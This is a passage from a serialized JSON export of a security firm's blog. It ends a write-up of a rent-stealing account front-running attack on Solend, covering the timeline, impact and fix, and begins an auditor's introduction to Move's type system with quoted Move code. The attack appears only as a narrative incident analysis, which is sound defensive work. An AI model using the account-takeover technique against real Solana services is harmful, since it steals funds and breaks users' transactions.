136,580,154, which is 41 slots (29 seconds) after the initial transaction.",{"type":24,"tag":32,"props":12428,"children":12429},{},[12430,12437,12438],{"type":24,"tag":188,"props":12431,"children":12434},{"href":12432,"rel":12433},"https://explorer.solana.com/tx/beYo1YBCa4fQ8swdJchx9s4qtgDQV4oVSEqwAX7UpHan4U4Jsv1oxY2V2ZxE77pBQHzYwV4gCXpDDKTgM7kBT4y",[192],[12435],{"type":30,"value":12436},"Transaction 2",{"type":30,"value":12388},{"type":24,"tag":177,"props":12439,"children":12441},{"alt":7,"src":12440},"https://i.imgur.com/of0GIdw.png",[],{"type":24,"tag":32,"props":12443,"children":12444},{},[12445],{"type":24,"tag":177,"props":12446,"children":12448},{"alt":7,"src":12447},"https://i.imgur.com/0STSyv8.png",[],{"type":24,"tag":32,"props":12450,"children":12451},{},[12452],{"type":30,"value":12453},"The developer attempts to take ownership of the account, but it fails with the error \"account or token already in use\" since the attacker took ownership of it. This took place in slot 136,580,167, which is 13 slots (9 seconds) after the attacker's transaction. In total, that's a 54 slot-gap (38 seconds) between the two Solend transactions.",{"type":24,"tag":32,"props":12455,"children":12456},{},[12457,12463],{"type":24,"tag":188,"props":12458,"children":12461},{"href":12459,"rel":12460},"https://explorer.solana.com/tx/3D45bCbbeSEaigz3RX6GRKuoDSok3FHMi5Z2N5HDXcPjqMzu3Qx5iEoXh56RWg1mn7w9ZuZifD91n1DwnPjdaW2G",[192],[12462],{"type":30,"value":12412},{"type":30,"value":1679},{"type":24,"tag":32,"props":12465,"children":12466},{},[12467],{"type":24,"tag":177,"props":12468,"children":12470},{"alt":7,"src":12469},"https://i.imgur.com/AmSPdmy.png",[],{"type":24,"tag":32,"props":12472,"children":12473},{},[12474],{"type":30,"value":12397},{"type":24,"tag":32,"props":12476,"children":12477},{},[12478],{"type":30,"value":12479},"Now that the attack is over, the attacker closes the accounts, transferring the rent money to themselves. The total money stolen during this attack was 0.00815212 SOL.",{"type":24,"tag":43,"props":12481,"children":12483},{"id":12482},"impact",[12484],{"type":30,"value":12485},"Impact",{"type":24,"tag":32,"props":12487,"children":12488},{},[12489],{"type":30,"value":12490},"Rent-thieving attacks don't steal much money.",{"type":24,"tag":32,"props":12492,"children":12493},{},[12494],{"type":30,"value":12495},"They can only make a small profit very infrequently as Solana rent is cheap and there are only a handful of large services that separate account creation and initialization. In addition, this stratedgy doesn't scale well, since such non-atomic account creation is relatively infrequent.",{"type":24,"tag":32,"props":12497,"children":12498},{},[12499],{"type":30,"value":12500},"However, it's still obnoxious even if the monetary impact is minimal. Transactions will fail and need to be remade, impacting usability.",{"type":24,"tag":43,"props":12502,"children":12504},{"id":12503},"solution",[12505],{"type":30,"value":12506},"Solution",{"type":24,"tag":32,"props":12508,"children":12509},{},[12510],{"type":30,"value":12511},"As a temporary stopgap, Solend refactored their codebase to lower the 40 second delay between transactions to around 15 seconds (20 slots), making an attack much more difficult and inconsistent.",{"type":24,"tag":32,"props":12513,"children":12514},{},[12515,12517,12524],{"type":30,"value":12516},"As a more permenant solution, Solend implemented ",{"type":24,"tag":188,"props":12518,"children":12521},{"href":12519,"rel":12520},"https://explorer.solana.com/tx/3DR74oQh966HbozLPYFqTgCmQWbUNSBkjUcEs7CuWxMPNxM3mBzqH7Gqu1mVRBRxNSTWJBcJkTnCzmoqD6kPYMXE?cluster=devnet",[192],[12522],{"type":30,"value":12523},"an onchain program",{"type":30,"value":12525}," which handles account creation, allowing them to fit all the relevant instructions into one transaction.",{"title":7,"searchDepth":320,"depth":320,"links":12527},[12528,12529,12530,12531,12532],{"id":12221,"depth":320,"text":12224},{"id":2746,"depth":320,"text":2749},{"id":12360,"depth":320,"text":12363},{"id":12482,"depth":320,"text":12485},{"id":12503,"depth":320,"text":12506},"content:blog:2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief.md","blog/2022-08-19-solend-rent-thief",{"_path":12537,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":12538,"description":12539,"author":12540,"image":12541,"date":12545,"isFeatured":16,"onBlogPage":16,"body":12546,"_type":9700,"_id":16063,"_source":9702,"_file":16064,"_stem":16065,"_extension":9705},"/blog/2022-09-06-move-introduction","Move: An Auditor's Introduction","What actually makes Move secure? A discussion of Move's typing system and formal verification.","robert",{"src":12542,"height":12543,"width":12544},"/posts/move-intro/title.jpg",1221,1400,"2022-09-06",{"type":21,"children":12547,"toc":16058},[12548,12553,12558,12577,12583,12595,12692,12700,12820,12828,12850,13002,13007,13265,13287,13321,13326,13346,13351,13362,13374,13585,13597,13611,13624,13881,13893,14113,14118,14146,14292,14310,14315,14580,14592,14597,14610,14616,14621,14626,14638,14652,14657,14755,14767,14780,15054,15059,15071,15076,15129,15149,15154,16027,16031,16036,16041,16054],{"type":24,"tag":32,"props":12549,"children":12550},{},[12551],{"type":30,"value":12552},"As part of our work, we seek to understand how to eliminate vulnerability classes. Designing safer languages enables developers to write code with confidence. How exactly does Move lend itself to safer programming practices? What can we learn from Move to generalize secure design principles for other execution environments?",{"type":24,"tag":32,"props":12554,"children":12555},{},[12556],{"type":30,"value":12557},"Lately, there appears to be many buzzwords floating around. Formal verification, type based safety, \"rust but for blockchain\".",{"type":24,"tag":32,"props":12559,"children":12560},{},[12561,12563,12568,12570,12575],{"type":30,"value":12562},"In this piece I'll seek to discuss exactly ",{"type":24,"tag":5422,"props":12564,"children":12565},{},[12566],{"type":30,"value":12567},"how",{"type":30,"value":12569}," move lends itself to more secure programming practices, potential shortcomings, and practical design tips for protocol developers looking to build ",{"type":24,"tag":5422,"props":12571,"children":12572},{},[12573],{"type":30,"value":12574},"structurally",{"type":30,"value":12576}," safer programs.",{"type":24,"tag":43,"props":12578,"children":12580},{"id":12579},"types",[12581],{"type":30,"value":12582},"Types",{"type":24,"tag":32,"props":12584,"children":12585},{},[12586,12588,12594],{"type":30,"value":12587},"One of the key selling points of Move is the use of typed resources. Aptos and Sui have slight variations in how they materialize this pattern, but as an example take ",{"type":24,"tag":145,"props":12589,"children":12591},{"className":12590},[],[12592],{"type":30,"value":12593},"coin.move",{"type":30,"value":206},{"type":24,"tag":291,"props":12596,"children":12598},{"className":9818,"code":12597,"language":9817,"meta":7,"style":7}," /// Main structure representing a coin/token in an account's custody.\n struct Coin\u003Cphantom CoinType> has store {\n /// Amount of coin this address has.\n value: u64,\n }\n",[12599],{"type":24,"tag":145,"props":12600,"children":12601},{"__ignoreMap":7},[12602,12610,12656,12664,12685],{"type":24,"tag":301,"props":12603,"children":12604},{"class":303,"line":304},[12605],{"type":24,"tag":301,"props":12606,"children":12607},{"style":1062},[12608],{"type":30,"value":12609}," /// Main structure representing a coin/token in an account's custody.\n",{"type":24,"tag":301,"props":12611,"children":12612},{"class":303,"line":320},[12613,12618,12623,12627,12632,12637,12642,12647,12652],{"type":24,"tag":301,"props":12614,"children":12615},{"style":348},[12616],{"type":30,"value":12617}," struct",{"type":24,"tag":301,"props":12619,"children":12620},{"style":10246},[12621],{"type":30,"value":12622}," Coin",{"type":24,"tag":301,"props":12624,"children":12625},{"style":359},[12626],{"type":30,"value":1849},{"type":24,"tag":301,"props":12628,"children":12629},{"style":369},[12630],{"type":30,"value":12631},"phantom",{"type":24,"tag":301,"props":12633,"children":12634},{"style":10246},[12635],{"type":30,"value":12636}," CoinType",{"type":24,"tag":301,"props":12638,"children":12639},{"style":359},[12640],{"type":30,"value":12641},"> ",{"type":24,"tag":301,"props":12643,"children":12644},{"style":369},[12645],{"type":30,"value":12646},"has",{"type":24,"tag":301,"props":12648,"children":12649},{"style":369},[12650],{"type":30,"value":12651}," store",{"type":24,"tag":301,"props":12653,"children":12654},{"style":359},[12655],{"type":30,"value":3035},{"type":24,"tag":301,"props":12657,"children":12658},{"class":303,"line":335},[12659],{"type":24,"tag":301,"props":12660,"children":12661},{"style":1062},[12662],{"type":30,"value":12663}," /// Amount of coin this address has.\n",{"type":24,"tag":301,"props":12665,"children":12666},{"class":303,"line":344},[12667,12672,12676,12681],{"type":24,"tag":301,"props":12668,"children":12669},{"style":369},[12670],{"type":30,"value":12671}," value",{"type":24,"tag":301,"props":12673,"children":12674},{"style":385},[12675],{"type":30,"value":1679},{"type":24,"tag":301,"props":12677,"children":12678},{"style":10246},[12679],{"type":30,"value":12680}," u64",{"type":24,"tag":301,"props":12682,"children":12683},{"style":359},[12684],{"type":30,"value":1729},{"type":24,"tag":301,"props":12686,"children":12687},{"class":303,"line":401},[12688],{"type":24,"tag":301,"props":12689,"children":12690},{"style":359},[12691],{"type":30,"value":6918},{"type":24,"tag":32,"props":12693,"children":12694},{},[12695],{"type":24,"tag":5422,"props":12696,"children":12697},{},[12698],{"type":30,"value":12699},"aptos",{"type":24,"tag":291,"props":12701,"children":12703},{"className":9818,"code":12702,"language":9817,"meta":7,"style":7}," /// A coin of type `T` worth `value`. Transferable and storable\n struct Coin\u003Cphantom T> has key, store {\n id: UID,\n balance: Balance\u003CT>\n }\n",[12704],{"type":24,"tag":145,"props":12705,"children":12706},{"__ignoreMap":7},[12707,12715,12765,12782,12813],{"type":24,"tag":301,"props":12708,"children":12709},{"class":303,"line":304},[12710],{"type":24,"tag":301,"props":12711,"children":12712},{"style":1062},[12713],{"type":30,"value":12714}," /// A coin of type `T` worth `value`. Transferable and storable\n",{"type":24,"tag":301,"props":12716,"children":12717},{"class":303,"line":320},[12718,12722,12726,12730,12734,12739,12743,12747,12752,12756,12761],{"type":24,"tag":301,"props":12719,"children":12720},{"style":348},[12721],{"type":30,"value":12617},{"type":24,"tag":301,"props":12723,"children":12724},{"style":10246},[12725],{"type":30,"value":12622},{"type":24,"tag":301,"props":12727,"children":12728},{"style":359},[12729],{"type":30,"value":1849},{"type":24,"tag":301,"props":12731,"children":12732},{"style":369},[12733],{"type":30,"value":12631},{"type":24,"tag":301,"props":12735,"children":12736},{"style":10246},[12737],{"type":30,"value":12738}," T",{"type":24,"tag":301,"props":12740,"children":12741},{"style":359},[12742],{"type":30,"value":12641},{"type":24,"tag":301,"props":12744,"children":12745},{"style":369},[12746],{"type":30,"value":12646},{"type":24,"tag":301,"props":12748,"children":12749},{"style":369},[12750],{"type":30,"value":12751}," key",{"type":24,"tag":301,"props":12753,"children":12754},{"style":359},[12755],{"type":30,"value":377},{"type":24,"tag":301,"props":12757,"children":12758},{"style":369},[12759],{"type":30,"value":12760},"store",{"type":24,"tag":301,"props":12762,"children":12763},{"style":359},[12764],{"type":30,"value":3035},{"type":24,"tag":301,"props":12766,"children":12767},{"class":303,"line":335},[12768,12773,12777],{"type":24,"tag":301,"props":12769,"children":12770},{"style":369},[12771],{"type":30,"value":12772}," id",{"type":24,"tag":301,"props":12774,"children":12775},{"style":385},[12776],{"type":30,"value":1679},{"type":24,"tag":301,"props":12778,"children":12779},{"style":359},[12780],{"type":30,"value":12781}," UID,\n",{"type":24,"tag":301,"props":12783,"children":12784},{"class":303,"line":344},[12785,12790,12794,12799,12803,12808],{"type":24,"tag":301,"props":12786,"children":12787},{"style":369},[12788],{"type":30,"value":12789}," balance",{"type":24,"tag":301,"props":12791,"children":12792},{"style":385},[12793],{"type":30,"value":1679},{"type":24,"tag":301,"props":12795,"children":12796},{"style":10246},[12797],{"type":30,"value":12798}," Balance",{"type":24,"tag":301,"props":12800,"children":12801},{"style":359},[12802],{"type":30,"value":1849},{"type":24,"tag":301,"props":12804,"children":12805},{"style":10246},[12806],{"type":30,"value":12807},"T",{"type":24,"tag":301,"props":12809,"children":12810},{"style":359},[12811],{"type":30,"value":12812},">\n",{"type":24,"tag":301,"props":12814,"children":12815},{"class":303,"line":401},[12816],{"type":24,"tag":301,"props":12817,"children":12818},{"style":359},[12819],{"type":30,"value":6918},{"type":24,"tag":32,"props":12821,"children":12822},{},[12823],{"type":24,"tag":5422,"props":12824,"children":12825},{},[12826],{"type":30,"value":12827},"sui",{"type":24,"tag":32,"props":12829,"children":12830},{},[12831,12833,12840,12842,12848],{"type":30,"value":12832},"Pulling an example from ",{"type":24,"tag":188,"props":12834,"children":12837},{"href":12835,"rel":12836},"https://pontem.network/",[192],[12838],{"type":30,"value":12839},"Pontem Network's",{"type":30,"value":12841}," Liquidswap DEX implementation on Aptos, we can see that ",{"type":24,"tag":145,"props":12843,"children":12845},{"className":12844},[],[12846],{"type":30,"value":12847},"LiquidityPool",{"type":30,"value":12849}," natively embeds this type information into it's fields.",{"type":24,"tag":291,"props":12851,"children":12853},{"className":9818,"code":12852,"language":9817,"meta":7,"style":7}," /// Liquidity pool with reserves.\n struct LiquidityPool\u003Cphantom X, phantom Y, phantom LP> has key {\n coin_x_reserve: Coin\u003CX>,\n coin_y_reserve: Coin\u003CY>,\n // ...\n }\n",[12854],{"type":24,"tag":145,"props":12855,"children":12856},{"__ignoreMap":7},[12857,12865,12928,12958,12987,12995],{"type":24,"tag":301,"props":12858,"children":12859},{"class":303,"line":304},[12860],{"type":24,"tag":301,"props":12861,"children":12862},{"style":1062},[12863],{"type":30,"value":12864}," /// Liquidity pool with reserves.\n",{"type":24,"tag":301,"props":12866,"children":12867},{"class":303,"line":320},[12868,12872,12877,12881,12885,12890,12894,12898,12903,12907,12911,12916,12920,12924],{"type":24,"tag":301,"props":12869,"children":12870},{"style":348},[12871],{"type":30,"value":5735},{"type":24,"tag":301,"props":12873,"children":12874},{"style":10246},[12875],{"type":30,"value":12876}," LiquidityPool",{"type":24,"tag":301,"props":12878,"children":12879},{"style":359},[12880],{"type":30,"value":1849},{"type":24,"tag":301,"props":12882,"children":12883},{"style":369},[12884],{"type":30,"value":12631},{"type":24,"tag":301,"props":12886,"children":12887},{"style":10246},[12888],{"type":30,"value":12889}," X",{"type":24,"tag":301,"props":12891,"children":12892},{"style":359},[12893],{"type":30,"value":377},{"type":24,"tag":301,"props":12895,"children":12896},{"style":369},[12897],{"type":30,"value":12631},{"type":24,"tag":301,"props":12899,"children":12900},{"style":10246},[12901],{"type":30,"value":12902}," Y",{"type":24,"tag":301,"props":12904,"children":12905},{"style":359},[12906],{"type":30,"value":377},{"type":24,"tag":301,"props":12908,"children":12909},{"style":369},[12910],{"type":30,"value":12631},{"type":24,"tag":301,"props":12912,"children":12913},{"style":359},[12914],{"type":30,"value":12915}," LP> ",{"type":24,"tag":301,"props":12917,"children":12918},{"style":369},[12919],{"type":30,"value":12646},{"type":24,"tag":301,"props":12921,"children":12922},{"style":369},[12923],{"type":30,"value":12751},{"type":24,"tag":301,"props":12925,"children":12926},{"style":359},[12927],{"type":30,"value":3035},{"type":24,"tag":301,"props":12929,"children":12930},{"class":303,"line":335},[12931,12936,12940,12944,12948,12953],{"type":24,"tag":301,"props":12932,"children":12933},{"style":369},[12934],{"type":30,"value":12935}," coin_x_reserve",{"type":24,"tag":301,"props":12937,"children":12938},{"style":385},[12939],{"type":30,"value":1679},{"type":24,"tag":301,"props":12941,"children":12942},{"style":10246},[12943],{"type":30,"value":12622},{"type":24,"tag":301,"props":12945,"children":12946},{"style":359},[12947],{"type":30,"value":1849},{"type":24,"tag":301,"props":12949,"children":12950},{"style":10246},[12951],{"type":30,"value":12952},"X",{"type":24,"tag":301,"props":12954,"children":12955},{"style":359},[12956],{"type":30,"value":12957},">,\n",{"type":24,"tag":301,"props":12959,"children":12960},{"class":303,"line":344},[12961,12966,12970,12974,12978,12983],{"type":24,"tag":301,"props":12962,"children":12963},{"style":369},[12964],{"type":30,"value":12965}," coin_y_reserve",{"type":24,"tag":301,"props":12967,"children":12968},{"style":385},[12969],{"type":30,"value":1679},{"type":24,"tag":301,"props":12971,"children":12972},{"style":10246},[12973],{"type":30,"value":12622},{"type":24,"tag":301,"props":12975,"children":12976},{"style":359},[12977],{"type":30,"value":1849},{"type":24,"tag":301,"props":12979,"children":12980},{"style":10246},[12981],{"type":30,"value":12982},"Y",{"type":24,"tag":301,"props":12984,"children":12985},{"style":359},[12986],{"type":30,"value":12957},{"type":24,"tag":301,"props":12988,"children":12989},{"class":303,"line":401},[12990],{"type":24,"tag":301,"props":12991,"children":12992},{"style":1062},[12993],{"type":30,"value":12994}," // ...\n",{"type":24,"tag":301,"props":12996,"children":12997},{"class":303,"line":415},[12998],{"type":24,"tag":301,"props":12999,"children":13000},{"style":359},[13001],{"type":30,"value":501},{"type":24,"tag":32,"props":13003,"children":13004},{},[13005],{"type":30,"value":13006},"This has the advantage of aligning type information at compile time. It would be difficult to accidentally pass in the wrong type of coin to a function.",{"type":24,"tag":291,"props":13008,"children":13010},{"className":9818,"code":13009,"language":9817,"meta":7,"style":7}," public fun mint\u003CX, Y, LP>(\n pool_addr: address,\n coin_x: Coin\u003CX>,\n coin_y: Coin\u003CY>\n ): Coin\u003CLP> acquires LiquidityPool, EventsStore {\n // ...\n\n let (x_reserve_size, y_reserve_size) = get_reserves_size\u003CX, Y, LP>(pool_addr);\n",[13011],{"type":24,"tag":145,"props":13012,"children":13013},{"__ignoreMap":7},[13014,13053,13074,13102,13130,13181,13189,13196],{"type":24,"tag":301,"props":13015,"children":13016},{"class":303,"line":304},[13017,13022,13027,13032,13036,13040,13044,13048],{"type":24,"tag":301,"props":13018,"children":13019},{"style":369},[13020],{"type":30,"value":13021}," public",{"type":24,"tag":301,"props":13023,"children":13024},{"style":369},[13025],{"type":30,"value":13026}," fun",{"type":24,"tag":301,"props":13028,"children":13029},{"style":369},[13030],{"type":30,"value":13031}," mint",{"type":24,"tag":301,"props":13033,"children":13034},{"style":359},[13035],{"type":30,"value":1849},{"type":24,"tag":301,"props":13037,"children":13038},{"style":10246},[13039],{"type":30,"value":12952},{"type":24,"tag":301,"props":13041,"children":13042},{"style":359},[13043],{"type":30,"value":377},{"type":24,"tag":301,"props":13045,"children":13046},{"style":10246},[13047],{"type":30,"value":12982},{"type":24,"tag":301,"props":13049,"children":13050},{"style":359},[13051],{"type":30,"value":13052},", LP>(\n",{"type":24,"tag":301,"props":13054,"children":13055},{"class":303,"line":320},[13056,13061,13065,13070],{"type":24,"tag":301,"props":13057,"children":13058},{"style":369},[13059],{"type":30,"value":13060}," pool_addr",{"type":24,"tag":301,"props":13062,"children":13063},{"style":385},[13064],{"type":30,"value":1679},{"type":24,"tag":301,"props":13066,"children":13067},{"style":369},[13068],{"type":30,"value":13069}," address",{"type":24,"tag":301,"props":13071,"children":13072},{"style":359},[13073],{"type":30,"value":1729},{"type":24,"tag":301,"props":13075,"children":13076},{"class":303,"line":335},[13077,13082,13086,13090,13094,13098],{"type":24,"tag":301,"props":13078,"children":13079},{"style":369},[13080],{"type":30,"value":13081}," coin_x",{"type":24,"tag":301,"props":13083,"children":13084},{"style":385},[13085],{"type":30,"value":1679},{"type":24,"tag":301,"props":13087,"children":13088},{"style":10246},[13089],{"type":30,"value":12622},{"type":24,"tag":301,"props":13091,"children":13092},{"style":359},[13093],{"type":30,"value":1849},{"type":24,"tag":301,"props":13095,"children":13096},{"style":10246},[13097],{"type":30,"value":12952},{"type":24,"tag":301,"props":13099,"children":13100},{"style":359},[13101],{"type":30,"value":12957},{"type":24,"tag":301,"props":13103,"children":13104},{"class":303,"line":344},[13105,13110,13114,13118,13122,13126],{"type":24,"tag":301,"props":13106,"children":13107},{"style":369},[13108],{"type":30,"value":13109}," coin_y",{"type":24,"tag":301,"props":13111,"children":13112},{"style":385},[13113],{"type":30,"value":1679},{"type":24,"tag":301,"props":13115,"children":13116},{"style":10246},[13117],{"type":30,"value":12622},{"type":24,"tag":301,"props":13119,"children":13120},{"style":359},[13121],{"type":30,"value":1849},{"type":24,"tag":301,"props":13123,"children":13124},{"style":10246},[13125],{"type":30,"value":12982},{"type":24,"tag":301,"props":13127,"children":13128},{"style":359},[13129],{"type":30,"value":12812},{"type":24,"tag":301,"props":13131,"children":13132},{"class":303,"line":401},[13133,13138,13142,13146,13150,13155,13159,13164,13168,13172,13177],{"type":24,"tag":301,"props":13134,"children":13135},{"style":359},[13136],{"type":30,"value":13137}," )",{"type":24,"tag":301,"props":13139,"children":13140},{"style":385},[13141],{"type":30,"value":1679},{"type":24,"tag":301,"props":13143,"children":13144},{"style":10246},[13145],{"type":30,"value":12622},{"type":24,"tag":301,"props":13147,"children":13148},{"style":359},[13149],{"type":30,"value":1849},{"type":24,"tag":301,"props":13151,"children":13152},{"style":10246},[13153],{"type":30,"value":13154},"LP",{"type":24,"tag":301,"props":13156,"children":13157},{"style":359},[13158],{"type":30,"value":12641},{"type":24,"tag":301,"props":13160,"children":13161},{"style":369},[13162],{"type":30,"value":13163},"acquires",{"type":24,"tag":301,"props":13165,"children":13166},{"style":10246},[13167],{"type":30,"value":12876},{"type":24,"tag":301,"props":13169,"children":13170},{"style":359},[13171],{"type":30,"value":377},{"type":24,"tag":301,"props":13173,"children":13174},{"style":10246},[13175],{"type":30,"value":13176},"EventsStore",{"type":24,"tag":301,"props":13178,"children":13179},{"style":359},[13180],{"type":30,"value":3035},{"type":24,"tag":301,"props":13182,"children":13183},{"class":303,"line":415},[13184],{"type":24,"tag":301,"props":13185,"children":13186},{"style":1062},[13187],{"type":30,"value":13188}," // ...\n",{"type":24,"tag":301,"props":13190,"children":13191},{"class":303,"line":439},[13192],{"type":24,"tag":301,"props":13193,"children":13194},{"emptyLinePlaceholder":16},[13195],{"type":30,"value":341},{"type":24,"tag":301,"props":13197,"children":13198},{"class":303,"line":447},[13199,13204,13208,13213,13217,13222,13226,13230,13235,13239,13243,13247,13251,13256,13261],{"type":24,"tag":301,"props":13200,"children":13201},{"style":348},[13202],{"type":30,"value":13203}," let",{"type":24,"tag":301,"props":13205,"children":13206},{"style":359},[13207],{"type":30,"value":873},{"type":24,"tag":301,"props":13209,"children":13210},{"style":369},[13211],{"type":30,"value":13212},"x_reserve_size",{"type":24,"tag":301,"props":13214,"children":13215},{"style":359},[13216],{"type":30,"value":377},{"type":24,"tag":301,"props":13218,"children":13219},{"style":369},[13220],{"type":30,"value":13221},"y_reserve_size",{"type":24,"tag":301,"props":13223,"children":13224},{"style":359},[13225],{"type":30,"value":911},{"type":24,"tag":301,"props":13227,"children":13228},{"style":385},[13229],{"type":30,"value":523},{"type":24,"tag":301,"props":13231,"children":13232},{"style":369},[13233],{"type":30,"value":13234}," get_reserves_size",{"type":24,"tag":301,"props":13236,"children":13237},{"style":359},[13238],{"type":30,"value":1849},{"type":24,"tag":301,"props":13240,"children":13241},{"style":10246},[13242],{"type":30,"value":12952},{"type":24,"tag":301,"props":13244,"children":13245},{"style":359},[13246],{"type":30,"value":377},{"type":24,"tag":301,"props":13248,"children":13249},{"style":10246},[13250],{"type":30,"value":12982},{"type":24,"tag":301,"props":13252,"children":13253},{"style":359},[13254],{"type":30,"value":13255},", LP>(",{"type":24,"tag":301,"props":13257,"children":13258},{"style":369},[13259],{"type":30,"value":13260},"pool_addr",{"type":24,"tag":301,"props":13262,"children":13263},{"style":359},[13264],{"type":30,"value":589},{"type":24,"tag":32,"props":13266,"children":13267},{},[13268,13270,13276,13278,13285],{"type":30,"value":13269},"As an aside, this generic type information is implemented at runtime in the ",{"type":24,"tag":145,"props":13271,"children":13273},{"className":13272},[],[13274],{"type":30,"value":13275},"ty_args",{"type":30,"value":13277}," ",{"type":24,"tag":188,"props":13279,"children":13282},{"href":13280,"rel":13281},"https://github.com/move-language/move/blob/2412f877a5065132f31bfc339e6d1f2b9de10e87/language/move-vm/runtime/src/interpreter.rs#L88",[192],[13283],{"type":30,"value":13284},"at the vm level",{"type":30,"value":13286},". This VM level implementation choice makes it rather difficult to iterate over arbitrary generic types, such as with summing the coins in a pool. We will be releasing a deep dive into move's VM internals shortly.",{"type":24,"tag":32,"props":13288,"children":13289},{},[13290,13292,13298,13300,13306,13307,13313,13314,13320],{"type":30,"value":13291},"In pseucode, this checks that ",{"type":24,"tag":145,"props":13293,"children":13295},{"className":13294},[],[13296],{"type":30,"value":13297},"coin_x.type",{"type":30,"value":13299}," is equal to ",{"type":24,"tag":145,"props":13301,"children":13303},{"className":13302},[],[13304],{"type":30,"value":13305},"pool.x_type",{"type":30,"value":8410},{"type":24,"tag":145,"props":13308,"children":13310},{"className":13309},[],[13311],{"type":30,"value":13312},"coin_y.type",{"type":30,"value":13299},{"type":24,"tag":145,"props":13315,"children":13317},{"className":13316},[],[13318],{"type":30,"value":13319},"pool.y_type",{"type":30,"value":206},{"type":24,"tag":32,"props":13322,"children":13323},{},[13324],{"type":30,"value":13325},"This type system has two advantages",{"type":24,"tag":6246,"props":13327,"children":13328},{},[13329,13341],{"type":24,"tag":2659,"props":13330,"children":13331},{},[13332,13334,13339],{"type":30,"value":13333},"It's required. The type parameter ",{"type":24,"tag":5422,"props":13335,"children":13336},{},[13337],{"type":30,"value":13338},"must",{"type":30,"value":13340}," be specified so it's impossible to forget such a constraint",{"type":24,"tag":2659,"props":13342,"children":13343},{},[13344],{"type":30,"value":13345},"It's concise. Constraints are done via type parameter alignment instead of verbose equivalence checks",{"type":24,"tag":32,"props":13347,"children":13348},{},[13349],{"type":30,"value":13350},"However, this system isn't perfect.",{"type":24,"tag":32,"props":13352,"children":13353},{},[13354,13356,13361],{"type":30,"value":13355},"In fact, I would go as far as to argue that using types to create such associations is ",{"type":24,"tag":60,"props":13357,"children":13358},{},[13359],{"type":30,"value":13360},"an anti-pattern",{"type":30,"value":206},{"type":24,"tag":32,"props":13363,"children":13364},{},[13365,13367,13373],{"type":30,"value":13366},"Using types to enforce relationships only works because types are uniquely associated with instances. For example, in Aptos's coin initialization function, they explicitly assert that there hasn't been a previously initialized ",{"type":24,"tag":145,"props":13368,"children":13370},{"className":13369},[],[13371],{"type":30,"value":13372},"CoinInfo\u003CCoinType>",{"type":30,"value":206},{"type":24,"tag":291,"props":13375,"children":13377},{"className":9818,"code":13376,"language":9817,"meta":7,"style":7}," fun initialize_internal\u003CCoinType>(\n // ...\n ): (BurnCapability\u003CCoinType>, FreezeCapability\u003CCoinType>, MintCapability\u003CCoinType>) {\n // ...\n\n assert!(\n !exists\u003CCoinInfo\u003CCoinType>>(account_addr),\n error::already_exists(ECOIN_INFO_ALREADY_PUBLISHED),\n );\n",[13378],{"type":24,"tag":145,"props":13379,"children":13380},{"__ignoreMap":7},[13381,13408,13416,13485,13492,13499,13511,13555,13577],{"type":24,"tag":301,"props":13382,"children":13383},{"class":303,"line":304},[13384,13389,13394,13398,13403],{"type":24,"tag":301,"props":13385,"children":13386},{"style":369},[13387],{"type":30,"value":13388}," fun",{"type":24,"tag":301,"props":13390,"children":13391},{"style":369},[13392],{"type":30,"value":13393}," initialize_internal",{"type":24,"tag":301,"props":13395,"children":13396},{"style":359},[13397],{"type":30,"value":1849},{"type":24,"tag":301,"props":13399,"children":13400},{"style":10246},[13401],{"type":30,"value":13402},"CoinType",{"type":24,"tag":301,"props":13404,"children":13405},{"style":359},[13406],{"type":30,"value":13407},">(\n",{"type":24,"tag":301,"props":13409,"children":13410},{"class":303,"line":320},[13411],{"type":24,"tag":301,"props":13412,"children":13413},{"style":1062},[13414],{"type":30,"value":13415}," // ...\n",{"type":24,"tag":301,"props":13417,"children":13418},{"class":303,"line":335},[13419,13424,13428,13432,13437,13441,13445,13450,13455,13459,13463,13467,13472,13476,13480],{"type":24,"tag":301,"props":13420,"children":13421},{"style":359},[13422],{"type":30,"value":13423}," )",{"type":24,"tag":301,"props":13425,"children":13426},{"style":385},[13427],{"type":30,"value":1679},{"type":24,"tag":301,"props":13429,"children":13430},{"style":359},[13431],{"type":30,"value":873},{"type":24,"tag":301,"props":13433,"children":13434},{"style":10246},[13435],{"type":30,"value":13436},"BurnCapability",{"type":24,"tag":301,"props":13438,"children":13439},{"style":359},[13440],{"type":30,"value":1849},{"type":24,"tag":301,"props":13442,"children":13443},{"style":10246},[13444],{"type":30,"value":13402},{"type":24,"tag":301,"props":13446,"children":13447},{"style":359},[13448],{"type":30,"value":13449},">, ",{"type":24,"tag":301,"props":13451,"children":13452},{"style":10246},[13453],{"type":30,"value":13454},"FreezeCapability",{"type":24,"tag":301,"props":13456,"children":13457},{"style":359},[13458],{"type":30,"value":1849},{"type":24,"tag":301,"props":13460,"children":13461},{"style":10246},[13462],{"type":30,"value":13402},{"type":24,"tag":301,"props":13464,"children":13465},{"style":359},[13466],{"type":30,"value":13449},{"type":24,"tag":301,"props":13468,"children":13469},{"style":10246},[13470],{"type":30,"value":13471},"MintCapability",{"type":24,"tag":301,"props":13473,"children":13474},{"style":359},[13475],{"type":30,"value":1849},{"type":24,"tag":301,"props":13477,"children":13478},{"style":10246},[13479],{"type":30,"value":13402},{"type":24,"tag":301,"props":13481,"children":13482},{"style":359},[13483],{"type":30,"value":13484},">) {\n",{"type":24,"tag":301,"props":13486,"children":13487},{"class":303,"line":344},[13488],{"type":24,"tag":301,"props":13489,"children":13490},{"style":1062},[13491],{"type":30,"value":13415},{"type":24,"tag":301,"props":13493,"children":13494},{"class":303,"line":401},[13495],{"type":24,"tag":301,"props":13496,"children":13497},{"emptyLinePlaceholder":16},[13498],{"type":30,"value":341},{"type":24,"tag":301,"props":13500,"children":13501},{"class":303,"line":415},[13502,13507],{"type":24,"tag":301,"props":13503,"children":13504},{"style":314},[13505],{"type":30,"value":13506}," assert!",{"type":24,"tag":301,"props":13508,"children":13509},{"style":359},[13510],{"type":30,"value":1707},{"type":24,"tag":301,"props":13512,"children":13513},{"class":303,"line":439},[13514,13519,13524,13528,13533,13537,13541,13546,13551],{"type":24,"tag":301,"props":13515,"children":13516},{"style":385},[13517],{"type":30,"value":13518}," 